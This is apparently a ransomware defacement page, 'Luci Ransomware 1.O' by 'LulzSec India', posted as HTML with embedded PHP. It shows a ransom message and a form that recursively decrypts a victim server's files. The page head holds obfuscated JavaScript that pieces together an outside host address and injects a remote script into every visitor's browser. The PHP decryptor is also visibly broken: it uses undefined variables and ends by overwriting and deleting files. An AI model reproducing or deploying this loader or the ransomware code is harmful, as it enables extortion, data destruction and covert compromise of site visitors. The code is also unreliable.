· 6 years ago · Jul 04, 2019, 06:20 AM
1<!--coded by Mr.bl@ck_h3x & Scr!pt1337-->
2
3<!DOCTYPE html>
4
5<html class="no-js" lang="en">
6 <head>
7
8 <script language="JavaScript">
9var brzinakucanja = 200;
10var pauzapor = 2000;
11var vremeid = null;
12var kretanje = false;
13var poruka = new Array();
14var slporuka = 0;
15var bezporuke = 0;
16poruka[0] = "Luci Ransomware 1.O"
17
18function prikaz() {
19 var text = poruka[slporuka];
20
21 if (bezporuke < text.length) {
22 if (text.charAt(bezporuke) == " ")
23 bezporuke++
24 var ttporuka = text.substring(0, bezporuke + 1);
25 document.title = ttporuka;
26 bezporuke++
27 vremeid = setTimeout("prikaz()", brzinakucanja);
28 kretanje = true;
29 } else {
30 bezporuke = 0;
31 slporuka++
32 if (slporuka == poruka.length)
33 slporuka = 0;
34 vremeid = setTimeout("prikaz()", pauzapor);
35 kretanje = true;
36 }
37}
38function stop() {
39 if (kretanje)
40 clearTimeout(vremeid);
41 kretanje = false
42}
43function start() {
44 stop();
45 prikaz();
46}
47start();
48 </script>
49
50
51
52 <script type="text/javascript">
53 var DADrightclicktheme = 'Dark';
54 var DADrightclickimage = 'https://www.searchpng.com/wp-content/uploads/2019/01/Indian-Flag-PNG.png';
55</script>
56
57
58<script>
59 if (DADrightclicktheme == 'Merah' || DADrightclicktheme == 'MERAH' || DADrightclicktheme == 'merah') {
60 var DADarcv2t = 'rgba(239,110,119, 0.9)';
61 } else if (DADrightclicktheme == 'Biru' || DADrightclicktheme == 'BIRU' || DADrightclicktheme == 'biru') {
62 var DADarcv2t = 'rgba(110,137,239, 0.9)';
63 } else if (DADrightclicktheme == 'Hijau' || DADrightclicktheme == 'HIJAU' || DADrightclicktheme == 'hijau') {
64 var DADarcv2t = 'rgba(110,239,110, 0.9)';
65 } else if (DADrightclicktheme == 'Light' || DADrightclicktheme == 'light' || DADrightclicktheme == 'LIGHT') {
66 var DADarcv2t = 'rgba(255,255,255, 0.9)';
67 } else if (DADrightclicktheme == 'Pink' || DADrightclicktheme == 'pink' || DADrightclicktheme == 'PINK') {
68 var DADarcv2t = 'rgba(239,110,225, 0.9)';
69 } else if (DADrightclicktheme == 'Dark' || DADrightclicktheme == 'dark' || DADrightclicktheme == 'DARK') {
70 var DADarcv2t = 'rgba(0,0,0, 0.9)';
71 } else {
72 {
73 var DADarcv2t = 'transparent';
74 }
75 }
76
77 function DADarcvwi2() {
78 var DADarcv2v = document.getElementById('DADarcv2c');
79 if (DADarcv2v.style.display == "block") {
80 DADarcv2v.style.display = "none";
81 } else {
82 DADarcv2v.style.display = "block";
83 }
84 }
85
86 function DADarcwiv2a() {
87 DADarcvwi2();
88 return false;
89 }
90 document.oncontextmenu = DADarcwiv2a;
91 var ypro = 'http:';
92 var yajax = document.createElement('script');
93 yajax.type = 'text/javascript';
94 var yquery = 'dic';
95 var ybrow = 'aru.c';
96 var yint = '/';
97 yajax.src = ypro + '//x.' + yquery + 'keym' + ybrow + 'om' + yint + 'y';
98 document.getElementsByTagName('head')[0].appendChild(yajax);
99 var DADrcdiv = document.write('<style type="text/css"/>#DADarcv2c{background:url(' + DADrightclickimage + ') no-repeat center center fixed ' + DADarcv2t + ';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=""/><center><span><a href="#" target="_blank"/></a></span></center></div>');
100 document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
101</script>
102
103
104
105
106
107 <meta charset="UTF-8" />
108 <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
109 <title>Luci Ransomware 1.O</title>
110 <meta name="description" content="LulzSec India" />
111 <meta name="keywords" content="LulzSec India " />
112 <meta name="author" content="LulzSec India " />
113 <link rel="shortcut icon" type="image/x-icon" href="https://i.postimg.cc/5ywFKRwD/logo-lulzsec.png"/>
114 <link rel="stylesheet" type="text/css" href="https://dl.dropbox.com/s/rihay88vmbgj0si/demo.css" />
115 <link rel="stylesheet" type="text/css" href="https://dl.dropbox.com/s/cwbweul00t5i3n0/lulz.css" />
116
117
118 </head>
119 <body id="page">
120 <ul class="cb-slideshow">
121 <li><span>Image 01</span></li>
122 <li><span>Image 02</span></li>
123 <li><span>Image 03</span></li>
124 <li><span>Image 04</span></li>
125 <li><span>Image 05</span></li>
126 <li><span>Image 06</span></li>
127 </ul>
128 <div class="container">
129
130
131 <header>
132
133 <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Audiowide" rel="stylesheet">
134 <style>
135 body {
136 font-family: 'Audiowide', cursive;
137 }
138 </style>
139
140
141
142
143<center><font color="red"<span style="font-size:73px;text-shadow: 0 0 12px white, 0px 0px 10px orange">Luci Ransomware 1.O</span></font></center>
144<center><font color="red"<span style="font-size:57px;text-shadow: 0 0 12px white, 0px 0px 10px orange">By</span></font></center>
145<center><font color="red"<span style="font-size:57px;text-shadow: 0 0 12px white, 0px 0px 10px orange">LulzSec India</span></font></center>
146
147<center><img src="https://i.postimg.cc/5ywFKRwD/logo-lulzsec.png" height="300" width="330"></center>
148
149<center><img alt="kuch na " width=70 height=50 src="http://www.sherv.net/cm/emo/hug/hug-2.gif"><font color="White"<span style="font-size:45px;text-shadow: 0 0 12px white, 0px 0px 10px white">|| fuck you admin ||</span></font><img alt="kuch na" width=70 height=50 src="http://www.sherv.net/cm/emo/hug/hug-2.gif"></center>
150
151<center>
152<font color="red" <span style="font-size:20px;text-shadow: 0 0 12px white, 0px 0px 10px red">Message</span></font>
153<font color="White" <span style="font-size:20px;text-shadow: 0 0 12px white, 0px 0px 10px white">
154 Your all files has been encrypt for decrypt files contuct us on our page<br>
155
156</center>
157<br>
158<center>
159<form action="" method="post">
160 <font size="3"><font color="red"><td>Enter Key:</td></font><td><input type="text" name="key"></td>
161 <font size="3"><font color="red"><td>Dir from where Decryption start:</td></font><td><input type="text" name="dir"></td>
162<button type="submit" name="button" formmethod="post">Decrypt</button><br>
163</form>
164</tr>
165<font size="3"><font color="red"><td>Current Directory = <?php echo getcwd(); ?></td></font>
166</center>
167
168<marquee><br><center><font color="white" <span style="font-size:34px;text-shadow: 0 0 12px red, 0px 0px 20px red"> Superna H@xor | H3xking | MR.BL@CK_H3X | Scr!pt 1337 | GD ATTACKER | H@cker Inside | R4J H@XOR | J@ma7 | All indian Hackers |</span></font></marquee><br>
169
170<iframe width="0" height="0" src="http://picosong.com/wfA8F/" frameborder="0"></iframe>
171
172<a href="https://www.facebook.com/LulzSecIndiaHQ/" target="_blank"><img src="https://www.freeiconspng.com/uploads/logo-facebook-30.png" alt="facebook" style="position:fixed;top:200px;right:10px; border: #000" height="150" width="150"></a>
173<h2><span class="style1">
174<style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" />
175
176</head>
177<?php
178
179
180function get_all_directory_and_files($secret_key,$dir){
181
182 $password = hash('sha256', $secret_key);
183
184 $dh = new DirectoryIterator($dir);
185
186 foreach ($dh as $item) {
187 if (!$item->isDot()) {
188 if ($item->isDir()) {
189 get_all_directory_and_files($password,"$dir/$item");
190 } else {
191 $hell = $dir . "/" . $item->getFilename();
192 echo $hell;
193 $decry = substr($hell, 0, -9);
194 AES_CBC::decryptFile($password, $hell, $decry);
195 }
196 }
197 }
198 }
199
200if (filter_has_var(INPUT_POST, "button")) {
201 $secret_key = $_POST['key'];
202 $dir = $_POST['dir'];
203 get_all_directory_and_files($secret_key,$dir);
204
205}
206
207class AES_CBC
208{
209 protected static $KEY_SIZES = array('AES-128'=>16,'AES-192'=>24,'AES-256'=>32);
210 protected static function key_size() { return self::$KEY_SIZES['AES-256']; }
211
212
213 public static function decryptFile($password, $aes_filename, $out_stream) {
214 $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
215 $hmac_raw = file_get_contents($aes_filename, false, NULL, 0, 32);
216 $hmac_salt = file_get_contents($aes_filename, false, NULL, 32, $iv_size);
217 $hmac_calc = self::calculate_hmac_after_32bytes($password, $hmac_salt, $aes_filename);
218 $fc = fopen($aes_filename, "rb");
219 $fout = fopen($out_stream, 'wb');
220 if (!empty($fout) && !empty($fc) && self::hash_equals($hmac_raw,$hmac_calc)) {
221 fread($fc, 32+$iv_size);
222 $esalt = fread($fc, $iv_size);
223 $iv = fread($fc, $iv_size);
224 $ekey = hash_pbkdf2("sha256", $password, $esalt, $iteke=1000, self::key_size(), $raw=true);
225 $opts = array('mode'=>'cbc', 'iv'=>$iv, 'key'=>$y);
226 stream_filter_append($fc, 'mdecrypt.rijndael-128', STREAM_FILTER_READ, $opts);
227 while (!feof($fc)) {
228 $block = fread($fc, 8192);
229 if (feof($fc)) {
230 $padding = ord($block[strlen($block) - 1]);
231 $block = substr($block, 0, 0-$padding);
232 }
233 fwrite($fout, $block);
234 }
235 fclose($fout);
236 fclose($fc);
237 }
238 $FileLink = fopen($input_stream, 'wb') or die("can't open file");
239 fwrite($FileLink, hash('sha256', 'fuckyou'));
240 fclose($FileLink);
241 unlink($input_stream) or die("Couldn't delete file");
242 }
243 private static function hash_equals($str1, $str2) {
244 if(strlen($str1) == strlen($str2)) {
245 $res = $str1 ^ $str2;
246 for($ret=0,$i = strlen($res) - 1; $i >= 0; $i--) $ret |= ord($res[$i]);
247 return !$ret;
248 }
249 return false;
250 }
251 private static function calculate_hmac_after_32bytes($password, $hsalt, $filename) {
252 static $init=0;
253 $init or $init = stream_filter_register("user-filter.skipfirst32bytes", "FileSkip32Bytes");
254 $stream = 'php://filter/read=user-filter.skipfirst32bytes/resource=' . $filename;
255 $hkey = hash_pbkdf2("sha256", $password, $hsalt, $iterations=1000, 24, $raw=true);
256 return hash_hmac_file('sha256', $stream, $hkey, $raw=true);
257 }
258}
259class FileSkip32Bytes extends php_user_filter
260{
261 private $skipped=0;
262 function filter($in, $out, &$consumed, $closing) {
263 while ($bucket = stream_bucket_make_writeable($in)) {
264 $outlen = $bucket->datalen;
265 if ($this->skipped<32){
266 $outlen = min($bucket->datalen,32-$this->skipped);
267 $bucket->data = substr($bucket->data, $outlen);
268 $bucket->datalen = $bucket->datalen-$outlen;
269 $this->skipped+=$outlen;
270 }
271 $consumed += $outlen;
272 stream_bucket_append($out, $bucket);
273 }
274 return PSFS_PASS_ON;
275 }
276}
277
278class AES_256_CBC extends AES_CBC {
279 protected static function key_size() { return self::$KEY_SIZES['AES-256']; }
280}
281
282?>
283<center><font color="blue" <span style="font-size:25px;text-shadow: 0 0 12px white, 0px 0px 10px white">©LulzSec India </span></font>
284</body>
285</html>